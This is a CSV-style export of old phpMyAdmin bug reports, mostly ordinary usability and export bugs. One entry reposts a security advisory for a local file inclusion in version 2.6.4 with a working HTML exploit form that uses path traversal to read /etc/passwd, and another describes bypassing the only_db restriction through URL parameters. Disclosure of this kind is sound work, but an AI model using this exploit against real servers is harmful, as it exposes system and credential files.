I have a table which Create table is like the following CREATE TABLE `dly sys cont type def` `NAME` varchar 255) NOT NULL default , `FIELDNAME` varchar 255) NOT NULL default , `MULTILINGUA` tinyint 1) unsigned default NULL, `TITLE` varchar 255) default NULL, `FIELDTYPE` varchar 255) NOT NULL default , `FIELDCONSTRAINTS` varchar 255) NOT NULL default , `FIELDMEANING` varchar 15) NOT NULL default , `SEQUENCE` tinyint 4) NOT NULL auto increment, PRIMARY KEY `NAME`,`FIELDNAME` 240)), KEY `NAME` `NAME`,`SEQUENCE`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 If I use export of phpMyAdmin 2.6.4 for exporting my db, in the export file I note a strange behaviour for this table.. infact I have CREATE TABLE `dly sys cont type def` `NAME` varchar 255) NOT NULL default , `FIELDNAME` varchar 255) NOT NULL default , `MULTILINGUA` tinyint 1) unsigned default NULL, `TITLE` varchar 255) default NULL, `FIELDTYPE` varchar 255) NOT NULL default `FIELDMEANING` varchar 15) NOT NULL default , `SEQUENCE` tinyint 4) NOT NULL auto increment, PRIMARY KEY `NAME`,`FIELDNAME` 240)), KEY `NAME` `NAME`,`SEQUENCE`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO INCREMENT=1 ; ... and in the end of .sql file, I find Limits for table `dly sys cont type def` ALTER TABLE `dly sys cont type def` `FIELDADD CONSTRAINTS` varchar 255) NOT NULL default ,; In the CREATE TABLE part of the export, the field FIELDCONSTRAINT disappeared, present in my table instead, and it has transformed in an incorrect line at the end of the export file.
It sounds like it is a problem of the name FIELDCONSTRAINT that make the phpMyAdmin behave in a weird way ....
This problem didn t occur with version 2.5.6 and previous versions.
Thank you.
Gabolander Original URL https sourceforge.net p phpmyadmin bugs 1798 https sourceforge.net p phpmyadmin bugs 1798 Original author gabolander Found in version 2.6.4","bug"
"24444","8166","Add field s) > type ENTER.
When you Add field s) write the Field name type [ENTER] instead mouse click) phpMyAdmin add a new field and not submit changes I suppose a lt;FORM gt; mistake.
Original URL https sourceforge.net p phpmyadmin bugs 1800 https sourceforge.net p phpmyadmin bugs 1800 Original author lotabi","bug"
"24444","8167","`otherdb`.`tab` is rewritten to `currentdb`.`tab`.
selecting db `test` in the sql tab insert SELECT FROM `mysql`.`user` produces error page iFehler SQL Befehl SELECT COUNT ) AS num FROM `test`.`user` MySQL meldet 1146 Table test.user doesn t exist this is new in CVS, works in 2.6.4 Original URL https sourceforge.net p phpmyadmin bugs 1801 https sourceforge.net p phpmyadmin bugs 1801 Original author cybot tm Found in version Latest Git","bug"
"24444","8168","CREATEing table w o perms doesn t properly error.
Greetings, When I try to create a table in an existing database using a user that has no CREATE permissions, the action seems to function properly.
The next page that is displayed allows me to enter what fields to add to the table.
When I enter fields to be added to the table, it errors out on submission, with the following, as would be expected 1142 CREATE command denied to user ...
However, it should have said this when I tried to create the table in the first place.
Ideally, it should act similarly to the Create new database option which is clearly labeled to show that I have no permissions to use that function.
Configuration MySQL 4.1.10a phpMyAdmin 2.6.4 pl1 Original URL https sourceforge.net p phpmyadmin bugs 1803 https sourceforge.net p phpmyadmin bugs 1803 Original author burley Found in version 2.6.4 pl1","bug"
"24444","8169","Ignore auto increment checkbox.
On export if i deactivate auto incement checkbox, in the dump auto increment value is present.
Original URL https sourceforge.net p phpmyadmin bugs 1804 https sourceforge.net p phpmyadmin bugs 1804 Original author laysoft Found in version 2.6.4 pl1","bug"
"24444","8170","Full Text link is broken.
The link to display a Full Text table is broken.
It produces the error SQL query SELECT FROM `Table` LIMIT Array, 30 MySQL said 1064 You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near Array, 30 at line 1 This is caused by a duplicate line in libraries display tbl.lib.php It puts 2 pos=x args on the link which turns pos into an array.
Line 614 616 are identical, remove one and it s fixed.
Original URL https sourceforge.net p phpmyadmin bugs 1802 https sourceforge.net p phpmyadmin bugs 1802 Original author vlyon Found in version 2.6.4 pl1","bug"
"24444","8171","MySQL 5.0.12 view becomes VIEW .
SHOW FULL TABLES now returns VIEW instead of view should phpMyAdmin recognice both?
or cause view was only used in BETA drop support for view and now only support VIEW beside this that at the moment PMA only supports view and reports an error on MySQL 5.0.13) Original URL https sourceforge.net p phpmyadmin bugs 1805 https sourceforge.net p phpmyadmin bugs 1805 Original author cybot tm Found in version Latest Git","bug"
"24444","8172","Create new table on database xxx tells No Privileges.
In a database view, Create new table on database xxx tells No Privileges although the user has privileges to create tables in this database.
Original URL https sourceforge.net p phpmyadmin bugs 1806 https sourceforge.net p phpmyadmin bugs 1806 Original author mpopp75 Found in version Latest Git","bug"
"24444","8173","can access db table not in server[only db].
with given url params you can access a db table not listed in server[ only db ] f.e.
with http localhost phpMyAdmin tbl properties structure.php?db=test table=adams db you can access db test and table adams db even with server[ only db ] = mysql ; Original URL https sourceforge.net p phpmyadmin bugs 1807 https sourceforge.net p phpmyadmin bugs 1807 Original author cybot tm Found in version Latest Git","bug"
"24444","8174","select aes decrypt throws error.
this statement SELECT aes decrypt field1, pwd ) AS field1 FROM table1 results in the error 1064 You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near field1 , pwd ) as field1 from table1 as far as i can tell, this started happening in 2.6.3 as it works fine in 2.6.2 and lt; tested on WinXP Pro with and without SP1 mysql 4.0.22 and 4.1.9 php 4.3.4 and 5.0 Original URL https sourceforge.net p phpmyadmin bugs 1808 https sourceforge.net p phpmyadmin bugs 1808 Original author jemminger Found in version Latest Git","bug"
"24444","8175","Can t set time in date time pop up window.
From the insert screen, click the date time icon to launch the date time pop up window.
Once in the window attempt to change the hour and then click anywhere outside of that textbox within the pop up.
It resets the hour to 00.
Original URL https sourceforge.net p phpmyadmin bugs 1809 https sourceforge.net p phpmyadmin bugs 1809 Original author cryptkeeper Found in version 2.6.4 pl1","bug"
"24444","8176","No submit button in date time pop up window.
The date time pop up window is missing a submit button.
Original URL https sourceforge.net p phpmyadmin bugs 1810 https sourceforge.net p phpmyadmin bugs 1810 Original author cryptkeeper Found in version 2.6.4 pl1","bug"
"24444","8177","MIME transformation hides MySQL field comment.
phpMyAdmin ver 2.6.4 mysql ver 4.1.8 win linux) After i am add only one MIME transformation to existing field with coomment, the structure of my table changes to view without comment for all fields.
Data Dictionary also contain no comments.
Deletting MIME trans.
change back this feature.
Original URL https sourceforge.net p phpmyadmin bugs 1811 https sourceforge.net p phpmyadmin bugs 1811 Original author grickoff Found in version 2.6.4","bug"
"24444","8178","Database name containing a hyphen.
Hello, I found a bug on the latest stable release of PHPmyAdmin.
My configuration is Fedora Core 2 PHP 4.3.10 2.4 Mysql 4.1.12 2 PHPMySql 2.6.4 pl1 When I have a database name with or characters, and when I connect to phpmyadmin, I have the menu create a new database .
My Mysql user don t have the right to do this.
When the database name don t have or characters, the menu isn t displayed.
Regards, Mizmooc Original URL https sourceforge.net p phpmyadmin bugs 1812 https sourceforge.net p phpmyadmin bugs 1812 Original author mizmooc Found in version 2.6.4 pl1","bug"
"24444","8179","Error while inserting mediumblob value.
Hello, I just created a database with in it a table images id = unsigned smallint primary The ID number data = mediumblob The data of the image type = varchar 4) The type of the image I ve tested it several times, and used Ethereal for stats.
When I point to insert, select a file sizes vary from 1 to 240 KB included), set an id number and a type and click start, it sends the file in less then a second localhost).
After sending Ethereal shows nothing for about 57 seconds, and then I get an error about max execution time.
However, the file IS actually inserted, no problems with that.
The problem is that it wait so long.
It is very annoying to wait about a minute to upload a file of 9 KB.
My configuration Apache 2.0.54 PHP 5.0.5 phpMyAdmin 2.6.4 pl1 Best regards, JJK Original URL https sourceforge.net p phpmyadmin bugs 1813 https sourceforge.net p phpmyadmin bugs 1813 Original author jjksourceforge Found in version 2.6.4 pl1","bug"
"24444","8180","text after enter in textfield is gone when edited.
I ve a textfield in one of my tables wich contains enters and when I edit a record wich contains such a field, al the data after and also the enter) are gone.
Original URL https sourceforge.net p phpmyadmin bugs 1814 https sourceforge.net p phpmyadmin bugs 1814 Original author brainhead","bug"
"24444","8181","information schema browsing.
Tabs in information schema tables for browsing and searching are disabled, even when browsing actually works.
Original URL https sourceforge.net p phpmyadmin bugs 1815 https sourceforge.net p phpmyadmin bugs 1815 Original author nijel","bug"
"24444","8182","Scaled icons on tabs.
In current CVS, icons shown on tabs are scaled down and because of this look really ugly and it is hard to recognize what each icon should mean.
Screenshot attached.
Original URL https sourceforge.net p phpmyadmin bugs 1816 https sourceforge.net p phpmyadmin bugs 1816 Original author nijel Found in version Latest Git","bug"
"24444","8183","new import and LIMIT.
With 2.6.4, when typing SELECT from thetable in a query box, the logic always took care of adding a LIMIT clause.
This is no longer true with current code, so the full table is displayed!
Original URL https sourceforge.net p phpmyadmin bugs 1817 https sourceforge.net p phpmyadmin bugs 1817 Original author lem9 Found in version Latest Git","bug"
"24444","8184","timestamp not null.
Hello, when i define a table with timestamp not null phpmyadmin shows it later as timestamp null .
The table export in phpmyadmin ist correct not null but the gui isn t correct.
What s wrong?
Martin Original URL https sourceforge.net p phpmyadmin bugs 1818 https sourceforge.net p phpmyadmin bugs 1818 Original author hofmar Found in version 2.6.2","bug"
"24444","8185","Local file inclusion.
BEGIN PGP SIGNED MESSAGE Hash SHA1 [phpMyAdmin Local file inclusion 2.6.4 pl1] Author Maksymilian Arciemowicz cXIb8O3 ).18 Date 10.10.2005 from SECURITYREASON.COM 0.Description phpMyAdmin 2.6.4 is a tool written in PHP intended to handle the administration of MySQL over the Web.
Currently it can create and drop databases, create drop alter tables, delete edit add fields, execute any SQL statement, manage keys on fields.
blablabla... phpMyAdmin is very dangerous script.
1.
Local file inclusion Critical) File .
libraries grab globals.lib.php This file is included by many files.
Example file index.php index.php lt;?php Id index.php,v 2.14 2004 10 19 17 23 09 nijel Exp vim expandtab sw=4 ts=4 sts=4 Gets core libraries and defines some variables require once .
libraries grab globals.lib.php ); require once .
libraries common.lib.php ); ... index.php ok so.
In .
libraries grab globals.lib.php we have 101 104 grab globals.lib.php if !
empty redirect ) ) \{ require .
.
redirect); exit ); \} end if !
empty redirect ) ) 101 104 grab globals.lib.php But before we have 53 67 grab globals.lib.php check if a subform is submitted redirect = NULL; if isset POST[ usesubform ] ) ) \{ if a subform is present and should be used the rest of the form is deprecated subform id = key POST[ usesubform ] ); subform = POST[ subform ][ subform id]; POST = subform; if isset POST[ redirect ] ) POST[ redirect ] != basename SERVER[ PHP SELF ] ) ) \{ redirect = POST[ redirect ]; unset POST[ redirect ] ); \} end if isset POST[ redirect ] ) ) \} end if isset POST[ usesubform ] ) ) end check if a subform is submitted 53 67 grab globals.lib.php If varible POST[ usesubform ] exists and is array, that we can created new varibles for POST example POST[ redirect ]).
subform = POST[ subform ][ subform id]; POST = subform; where array POST = array POST[subform][1] that POST[ redirect ]= POST[subform][1][redirect] and we have local file inclusion.
Example response in html Exploit lt;CENTER gt; lt;A HREF= http www.securityreason.com gt; lt;IMG SRC= http securityreason.com gfx small logo.png gt; lt; A gt; lt;P gt; lt;FORM action= http localhost phpMyAdmin 2.6.4 pl1 index.php method=post enctype= multipart form data gt; lt;input TYPE= hidden name= usesubform[1] value= 1 gt; lt;input TYPE= hidden name= usesubform[2] value= 1 gt; lt;input TYPE= text name= subform[1][redirect] value= .. .. .. .. .. .. .. etc passwd size=30 gt; File lt;p gt; lt;input TYPE= hidden name= subform[1][cXIb8O3] value= 1 gt; lt;input TYPE= submit value= Exploit gt; lt; FORM gt; Exploit Exploit http securityreason.com achievement exploitalert 2 2.
Greets sp3x 3.Contact Author Maksymilian Arciemowicz lt; cXIb8O3 gt; Email max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG KEY http securityreason.com key Arciemowicz.Maksymilian.gpg WWW http securityreason.com BEGIN PGP SIGNATURE Version GnuPG v1.4.2 FreeBSD) iD8DBQFDSnd 3Ke13X fTO4RAse3AKCAT3s7bzwySDsGHqYN0 Vm D OiwCdFf T cvqCRiRlK9XrQGvV3sYxzXQ= =yoDY END PGP SIGNATURE Original URL https sourceforge.net p phpmyadmin bugs 1819 https sourceforge.net p phpmyadmin bugs 1819 Original author cxib8o3 Found in version 2.6.4","bug"
"24444","8186","unchecked Add AUTO INCREMENT value Export.
While browsing a table and click Export , unchecked the option Add AUTO INCREMENT value , and then click Go , the sql I get still have a AUTO INCREMENT=n behind the table structure sql.
Original URL https sourceforge.net p phpmyadmin bugs 1820 https sourceforge.net p phpmyadmin bugs 1820 Original author diekiss Found in version 2.6.4 pl2","bug"
"24444","8187","Grouping base by name in menu.
Hi, I have two databases with very similar names liveuser test example1 liveuser test example2 The lt;select gt; menu on the left is making a lt;optgroup gt;.
It s quite lever but the regexp that cuts the database name is matching the first and not the last.
It is lt;optgroup label= liveuser gt; lt;option value= liveuser test example4 gt; test example4 lt; option gt; lt;option value= liveuser test example5 gt; test example5 lt; option gt; lt; optgroup gt; It may be imho) lt;optgroup label= liveuser test gt; lt;option value= liveuser test example4 gt; example4 lt; option gt; lt;option value= liveuser test example5 gt; example5 lt; option gt; lt; optgroup gt; Original URL https sourceforge.net p phpmyadmin bugs 1821 https sourceforge.net p phpmyadmin bugs 1821 Original author jeremylecour Found in version 2.6.4 pl1","bug"
"24444","8188","wrong descr for ALL PRIVILEGS .
in db specific rights the description ALL PRIVILEGS for a table in this db reports on mouseover ... except GRANT.
even if GRANT priv is given for this table Original URL https sourceforge.net p phpmyadmin bugs 1822 https sourceforge.net p phpmyadmin bugs 1822 Original author cybot tm Found in version 2.6.4 pl3","bug"
"24444","8189","db without rights but with table rights not listed.
a db without rights but with rights on a table in this db is not listed in user specific rights Original URL https sourceforge.net p phpmyadmin bugs 1823 https sourceforge.net p phpmyadmin bugs 1823 Original author cybot tm Found in version Latest Git","bug"
"24444","8190","Border around tabs.
I guess that border that is shown around tabs in current CVS is not intentional.
Original URL https sourceforge.net p phpmyadmin bugs 1824 https sourceforge.net p phpmyadmin bugs 1824 Original author nijel Found in version Latest Git","bug"
"24444","8191","History doesn t work correctly.
Clicking on query in history DB saved) either opens main phpMyAdmin page in query window or executes query within query window, but not in main frame.
Original URL https sourceforge.net p phpmyadmin bugs 1825 https sourceforge.net p phpmyadmin bugs 1825 Original author nijel Found in version Latest Git","bug"
"24444","8192","Query window functionnality.
Importing does not work no db has been selected.
Original URL https sourceforge.net p phpmyadmin bugs 1826 https sourceforge.net p phpmyadmin bugs 1826 Original author lem9 Found in version Latest Git","bug"
"24444","8193","failed to set auto increment value.
Hello, in the gui on the page table operation is an error when i try to set the auto increment value for an myISAM database.
The displayed sql query on the confirm page is also false.
It display not the query with the new value.
Ist display the old value.
So the values isn t changed.
When i type the correct query under table sql manually, it change the auto increment value.
In version 2.6.2 it works fine.
Greetings M. Hoffmann Vetter Original URL https sourceforge.net p phpmyadmin bugs 1827 https sourceforge.net p phpmyadmin bugs 1827 Original author hofmar Found in version 2.6.4 pl1","bug"
"24444","8194","NOTICE with more than 2 servers.
Notice Undefined index connect type in C \htdocs\phpMyAdmin\libraries\common.lib.php on line 1268 Notice Undefined index connect type in C \htdocs\phpMyAdmin\libraries\common.lib.php on line 1277 common.lib.php Gets the valid servers list and parameters foreach cfg[ Servers ] AS key = gt; val) \{ Don t use servers with no hostname 1268 if val[ connect type ] == tcp ) empty val[ host ])) \{ unset cfg[ Servers ][ key]); \} reproduce config.inc.php i = 1; cfg[ Servers ][ i][ extension ] = mysqli ; i ; cfg[ Servers ][ i][ host ] = localhost ; cfg[ Servers ][ i][ extension ] = mysqli ; i ; cfg[ Servers ][ i][ host ] = localhost ; cfg[ Servers ][ i][ extension ] = mysqli ; i ; cfg[ Servers ][ i][ host ] = localhost ; cfg[ Servers ][ i][ extension ] = mysqli ; if your remove the last, no notice is shown, if you add onr more more notices are shown the same again).
PHP Version 5.1.0b1 mysqli 4.1.7 client API) MySQL 5.0.10a beta nt server) Original URL https sourceforge.net p phpmyadmin bugs 1828 https sourceforge.net p phpmyadmin bugs 1828 Original author cybot tm Found in version Latest Git","bug"
"24444","8195","Chance you have found bug in the SQL parser.
I was doing a batch update on a table I had the wrong name) when I got this message back.
There is a chance that you may have found a bug in the SQL parser.
Please examine your query closely, and check that the quotes are correct and not mis matched.
Other possible failure causes may be that you are uploading a file with binary outside of a quoted text area.
You can also try your query on the MySQL command line interface.
The MySQL server error output below, if there is any, may also help you in diagnosing the problem.
If you still have problems or if the parser fails where the command line interface succeeds, please reduce your SQL query input to the single query that causes problems, and submit a bug report with the data chunk in the CUT section below BEGIN CUT eNqVVL9v2zoQ3vVX3FA0CeAotpOmqYIOtMy4KmTJpWQXyVRaYh0WNOlSotH63 zWLWOGTN06vZP8 A8XL6 AACTqSd fd9x1PlLGUBRD2IOxDTJMALl f43sBve7VGy L8fB3oYTxvHCWBfAiKgOovqoV t5WwvpJzf3W 6qyh759fQr bfXXWvcIHzaDfD3o9UGL5Bui3Fbzwxt zD3EAF37P753zU11704xB mnWAjGiSd2BGEe6j1DBO76I4JvDK73qTMQkw aV cbpSfW ybtL4ddKsyXThd FjlCS5F5NkFIDQ p67 fHrltUhRklGW4ydP4dOMW8nnSlSfIKO5l4tKVolbCmsA4C0c9brd3lFnu38jinsO2 3u6zN8 Gmr7U JqY3enRJf2sYKQL1em6sAYQZTbQCzWQiEvFEjU93D7uBKbfXgua6d2oIymbESS6I6E0Y8E KAo DfMpIzHcws00CaM0QXtIAdUYRoyGrR uMzqasmhIhriIYRwlUZZTFqXtkowHESpKMUkTmmaA kVOWoZGQNj3N4HhMWHLiwzGjk5 DOAoJDNI4mhEWkYQ0gTOa0LspjcnJvvahqLlCDdvahahq64ra WV7IXxpKoeDBCo4GhEbX1ig0PQBa1a6Upmo9QqPEQhqYarkWtpI1SmZgYs1nH2Jjhd7g6tGKDTBT 2qeFQ8tYKXTNSw4c0znNIXSqwW2gMmHXspDGh5fYhWtVX89bY1Fft53iAcaM3Gb5oJv PHGgbiG0 5HCMXe2d Puws0McBmBBK4cEWwgmjF1wLTd7oqCQzR64Qvdmi8NAzpU0tSg4vPzqTH0dO1nBQKja IvgEWdQGbiRysoZvPXaRezVKXjaCfVsJK5cNZ7XLlMklIh8k2QUn7XDChOOFmglbir JEMCI2wK5 txXdCKu5Ls3 UeBZs5uyRwIbVki VYCJwtkKlXnnlly3 YaJ1GbNO5D55K8NqgJIEUxsOLwXXOtm ZL7DB4dDhDUyU21b1T95XudhqLBDkm HqrGf K7C9N Nw ZXhROHIyR44D 3 7y7HKF6qGSxz0XK pWwCthL8R9SYa8eb8UD P4GfeybGLjG9WeNF1AcSf xYbvkXLvGCx hl8Y SSNlMxdE QETbYQ== END CUT BEGIN RAW ERROR C1 C2 LEN 673 674 1089 STR ?cleo CVS Id sqlparser.lib.php,v 2.36 2005 08 08 20 22 11 lem9 Exp MySQL 4.1.13a nt USR OS, AGENT, VER Win MOZILLA 5.0 PMA 2.6.4 pl2 PHP VER,OS 4.4.0 WINNT LANG en utf 8 SQL INSERT INTO `Variables` SET TesisNumero = 1001 , TesisFecha = 07 07 2005 , TesisAutor = Andr?s Campos, Mariluz Level, Alibeth Y?pez , TesisTitulo = REORGANIZACI?N ESTRUCTURAL Y FUNCIONAL DE LA DIRECCI?N DE SEGURIDAD DEL MINISTERIO DEL AMBIENTE Y DE LOS RECURSOS NATURALES MARN).
REP?BLICA BOLIVARIANA DE VENEZUELA) , TesisDetalles = Reestructuraci?n del ?rea de Control de Estudios del Colegio Universitario Prof. Lorenzo P?rez Rodr?guez orientada a una Cultura de Servicio.
amp;lt;b amp;gt;Autora Guzm?n Mar?a Eugenia 2001).
amp;lt; b amp;gt; Propuesta de Reorganizaci?n de los Servicios de la Biblioteca Luis Beltr?n Prieto Figueroa de la Universidad Experimental Sim?n Rodr?guez N?cleo Palo Verde.
amp;lt;b amp;gt;Autor Garc?a Luis Fernando 2001).
amp;lt; b amp;gt; Propuesta de Reestructuraci?n de la Gerencia de Recursos Humanos de Pinova, S.A. amp;lt;b amp;gt;Autoras Oropeza Jeanneth y Quevedo Rosa 2002) amp;lt; b amp;gt; , TesisTeoria = Teor?a de la Organizaci?n de la Escuela Organista.
amp;lt;br amp;gt;Teor?a Cl?sica de la Administraci?n.
amp;lt;br amp;gt;Manuales de Organizaci?n amp;lt;br amp;gt;Norma Covenin , TesisTutor = Yajaira La Cruz de P?rez END RAW SQL query INSERT INTO `Variables` SET TesisNumero = 1001 , TesisFecha = 07 07 2005 , TesisAutor = Andr?s Campos, Mariluz Level, Alibeth Y?pez , TesisTitulo = REORGANIZACI?N ESTRUCTURAL Y FUNCIONAL DE LA DIRECCI?N DE SEGURIDAD DEL MINISTERIO DEL AMBIENTE Y DE LOS RECURSOS NATURALES MARN).
REP?BLICA BOLIVARIANA DE VENEZUELA) , TesisDetalles = Reestructuraci?n del ?rea de Control de Estudios del Colegio Universitario Prof. Lorenzo P?rez Rodr?guez orientada a una Cultura de Servicio.
lt;b gt;Autora Guzm?n Mar?a Eugenia 2001).
lt; b gt; Propuesta de Reorganizaci?n de los Servicios de la Biblioteca Luis Beltr?n Prieto Figueroa de la Universidad Experimental Sim?n Rodr?guez N?cleo Palo Verde.
lt;b gt;Autor Garc?a Luis Fernando 2001).
lt; b gt; Propuesta de Reestructuraci?n de la Gerencia de Recursos Humanos de Pinova, S.A. lt;b gt;Autoras Oropeza Jeanneth y Quevedo Rosa 2002) lt; b gt; , TesisTeoria = Teor?a de la Organizaci?n de la Escuela Organista.
lt;br gt;Teor?a Cl?sica de la Administraci?n.
lt;br gt;Manuales de Organizaci?n lt;br gt;Norma Covenin , TesisTutor = Yajaira La Cruz de P?rez I solved my problem, I had the name of the table bad it was Tesis not Variables, ran the same batch and it worked.
That was a few days ago, very late in the night, so I only saved this response and kept it for further investigation.
Today with more time) I tried to reproduce the same problem, I couldn t, but I got a few strange messages back as you will see bellow.
First of all I only tried to do the same query via the query sql window and I got back the normal message statin that th Variables Table didn t exist OK for now.
Second I tried to run the original batch file and I got back this message There seems to be an error in your SQL query.
The MySQL server error output below, if there is any, may also help you in diagnosing the problem ERROR Unknown Punctuation String 518 STR lt; SQL INSERT INTO `Variables` SET TesisNumero = 1001 , TesisFecha = 07 07 2005 , TesisAutor = Andr?s Campos, Mariluz Level, Alibeth Y?pez , TesisTitulo = REORGANIZACI?N ESTRUCTURAL Y FUNCIONAL DE LA DIRECCI?N DE SEGURIDAD DEL MINISTERIO DEL AMBIENTE Y DE LOS RECURSOS NATURALES MARN).
REP?BLICA BOLIVARIANA DE VENEZUELA) , TesisDetalles = Reestructuraci?n del ?rea de Control de Estudios del Colegio Universitario Prof. Lorenzo P?rez Rodr?guez orientada a una Cultura de Servicio.
lt;b gt;Autora Guzm?n Mar?a Eugenia 2001).
lt; b gt; Propuesta de Reorganizaci?n de los Servicios de la Biblioteca Luis Beltr?n Prieto Figueroa de la Universidad Experimental Sim?n Rodr?guez N?cleo Palo Verde.
lt;b gt;Autor Garc?a Luis Fernando 2001).
lt; b gt;; Propuesta de Reestructuraci?n de la Gerencia de Recursos Humanos de Pinova, S.A. lt;b gt;Autoras Oropeza Jeanneth y Quevedo Rosa 2002) lt; b gt; , TesisTeoria = Teor?a de la Organizaci?n de la Escuela Organista.
lt;b gt;Teor?a Cl?sica de la Administraci?n.
lt;b gt;Manuales de Organizaci?n lt; b gt;Norma Covenin , TesisTutor = Yajaira La Cruz de P?rez SQL query INSERT INTO `Variables` SET TesisNumero = 1001 , TesisFecha = 07 07 2005 , TesisAutor = Andr?s Campos, Mariluz Level, Alibeth Y?pez , TesisTitulo = REORGANIZACI?N ESTRUCTURAL Y FUNCIONAL DE LA DIRECCI?N DE SEGURIDAD DEL MINISTERIO DEL AMBIENTE Y DE LOS RECURSOS NATURALES MARN).
REP?BLICA BOLIVARIANA DE VENEZUELA) , TesisDetalles = Reestructuraci?n del ?rea de Control de Estudios del Colegio Universitario Prof. Lorenzo P?rez Rodr?guez orientada a una Cultura de Servicio.
lt;b gt;Autora Guzm?n Mar?a Eugenia 2001).
lt; b gt; Propuesta de Reorganizaci?n de los Servicios de la Biblioteca Luis Beltr?n Prieto Figueroa de la Universidad Experimental Sim?n Rodr?guez N?cleo Palo Verde.
lt;b gt;Autor Garc?a Luis Fernando 2001).
lt; b gt;; Propuesta de Reestructuraci?n de la Gerencia de Recursos Humanos de Pinova, S.A. lt;b gt;Autoras Oropeza Jeanneth y Quevedo Rosa 2002) lt; b gt; , TesisTeoria = Teor?a de la Organizaci?n de la Escuela Organista.
lt;b gt;Teor?a Cl?sica de la Administraci?n.
lt;b gt;Manuales de Organizaci?n lt; b gt;Norma Covenin , TesisTutor = Yajaira La Cruz de P?rez MySQL said Documentation 1146 Table 5649.Variables doesn t exist As you can see, this is not the normal response in case of an error even though the final line correctly stated that Variables table does not exist.
Third I tried again in another form really don t remember how) and got this message back SQL query INSERT INTO `Variables` SET TesisNumero = 1001 , TesisFecha = 07 07 2005 , TesisAutor = Andr amp; 65533;s Campos, Mariluz Level, Alibeth Y amp; 65533;pez , TesisTitulo = REORGANIZACI amp; 65533;N ESTRUCTURAL Y FUNCIONAL DE LA DIRECCI amp; 65533;N DE SEGURIDAD DEL MINISTERIO DEL AMBIENTE Y DE LOS RECURSOS NATURALES MARN).
REP amp; 65533;BLICA BOLIVARIANA DE VENEZUELA) , TesisDetalles = Reestructuraci amp; 65533;n del amp; 65533;rea de Control de Estudios del Colegio Universitario Prof. Lorenzo P amp; 65533;rez Rodr amp; 65533;guez orientada a una Cultura de Servicio.
amp;lt;b amp;gt;Autora Guzm amp; 65533;n Mar amp; 65533;a Eugenia 2001).
amp;lt; b amp;gt; Propuesta de Reorganizaci amp; 65533;n de los Servicios de la Biblioteca Luis Beltr amp; 65533;n Prieto Figueroa de la Universidad Experimental Sim amp; 65533;n Rodr amp; 65533;guez N amp; 65533;cleo Palo Verde.
amp;lt;b amp;gt;Autor Garc amp; 65533;a Luis Fernando 2001).
amp;lt; b amp;gt;; Propuesta de Reestructuraci amp; 65533;n de la Gerencia de Recursos Humanos de Pinova, S.A. amp;lt;b amp;gt;Autoras Oropeza Jeanneth y Quevedo Rosa 2002) amp;lt; b amp;gt; , TesisTeoria = Teor amp; 65533;a de la Organizaci amp; 65533;n de la Escuela Organista.
amp;lt;b amp;gt;Teor amp; 65533;a Cl amp; 65533;sica de la Administraci amp; 65533;n. amp;lt;b amp;gt;Manuales de Organizaci amp; 65533;n amp;lt; b amp;gt;Norma Covenin , TesisTutor = Yajaira La Cruz de P amp; 65533;rez MySQL said Documentation 1146 Table 5649.Variables doesn t exist As you can see this return message is OK.
Even though, the original SQL Statement is as follow BEGIN INSERT INTO `Variables` SET TesisNumero = 1001 , TesisFecha = 07 07 2005 , TesisAutor = Andrxc3xa9s Campos, Mariluz Level, Alibeth Yxc3xa9pez , TesisTitulo = REORGANIZACIxc3x93N ESTRUCTURAL Y FUNCIONAL DE LA DIRECCIxc3x93N DE SEGURIDAD DEL MINISTERIO DEL AMBIENTE Y DE LOS RECURSOS NATURALES MARN).
REPxc3x9aBLICA BOLIVARIANA DE VENEZUELA) , TesisDetalles = Reestructuracixc3xb3n del xc3xa1rea de Control de Estudios del Colegio Universitario Prof. Lorenzo Pxc3xa9rez Rodrxc3xadguez orientada a una Cultura de Servicio.
lt;b gt;Autora Guzmxc3xa1n Marxc3xa1a Eugenia 2001).
lt; b gt; Propuesta de Reorganizacixc3xb3n de los Servicios de la Biblioteca Luis Beltrxc3xa1n Prieto Figueroa de la Universidad Experimental Simxc3xb3n Rodrxc3xadguez Nxc3xbacleo Palo Verde.
lt;b gt;Autor Garcxc3xada Luis Fernando 2001).
lt; b gt;; Propuesta de Reestructuracixc3xb3n de la Gerencia de Recursos Humanos de Pinova, S.A. lt;b gt;Autoras Oropeza Jeanneth y Quevedo Rosa 2002) lt; b gt; , TesisTeoria = Teorxc3xada de la Organizacixc3xb3n de la Escuela Organista.
lt;b gt;Teorxc3xada Clxc3xa1sica de la Administracixc3xb3n.
lt;b gt;Manuales de Organizacixc3xb3n lt; b gt;Norma Covenin , TesisTutor = Yajaira La Cruz de Pxc3xa9rez ; END Why do I get back Such strange responses?.
Why do I get back the strange characters instead of the accented?
Original URL https sourceforge.net p phpmyadmin bugs 1832 https sourceforge.net p phpmyadmin bugs 1832 Original author yacar suscri Found in version 2.6.4 pl2","bug"
"24444","8196","Unable to change autoindex of InnoDB table.
When using InnoDB, the field to change the autoindex under the Operations tab is not showing, although InnoDB supports it.
Original URL https sourceforge.net p phpmyadmin bugs 1836 https sourceforge.net p phpmyadmin bugs 1836 Original author cryptkeeper Found in version 2.6.4 pl3","bug"
"24444","8197","MySQL 5 strict error with autoincrement fields.
MySQL 5 Server running with strict mode CREATE TABLE `test` `id` bigint 20) NOT NULL auto increment, PRIMARY KEY `id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO INCREMENT=1; clicking on insert tab and than on ok produces error SQL INSERT INTO `test test` `id` ) VALUES ) MySQL 1264 Out of range value adjusted for column id at row 1 correct Syntax would be INSERT INTO `test test` ) VALUES ); or INSERT INTO `test test` ) VALUES ), ), ),... so we should not include fields in the UPDATE statemant that should not be changed!
... possible another checkbox called do not include in the sql statement Original URL https sourceforge.net p phpmyadmin bugs 1837 https sourceforge.net p phpmyadmin bugs 1837 Original author cybot tm Found in version 2.6.4 pl3","bug"
"24444","8198","The browse link does not work.
Hi all, I am using the new version on a box running RH AS 3 with apache 1.3x and php 4.3.1.
Everything works however, the Browse button does not work.
I am able to enter data using the Insert link.
On FireFox I get just a bank page with the table name on top.
When I used Opera I got a open window for sql.php.
Any suggestions?
You can email me directly at jafar.hosseinzadeh childrens.tch.harvard.edu Regards, jh Original URL https sourceforge.net p phpmyadmin bugs 1829 https sourceforge.net p phpmyadmin bugs 1829 Original author jafar78 Found in version 2.6.4 pl2","bug"
